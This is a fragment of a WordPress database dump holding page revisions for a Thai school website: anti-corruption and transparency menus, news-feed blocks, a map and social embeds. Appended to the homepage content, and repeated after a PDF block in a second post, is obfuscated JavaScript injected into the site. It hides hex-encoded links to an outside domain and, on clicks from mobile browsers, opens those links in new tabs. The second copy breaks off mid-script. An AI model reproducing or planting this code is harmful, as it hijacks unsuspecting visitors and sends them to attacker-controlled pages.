Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-08 16:08:31','2024-08-08 09:08:31','',14,'http://pakhaeng.ssk.in.th/?p=711',0,'revision','',0),
(712,1,'2024-08-08 16:09:50','2024-08-08 09:09:50','<!-- wp:file {\"id\":1489,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ\"></object><a id=\"wp-block-file--media-56a02cbf-57f4-4c08-af84-dbe18e44683a\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ.pdf\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-56a02cbf-57f4-4c08-af84-dbe18e44683a\">Download</a></div>\n<!-- /wp:file -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return 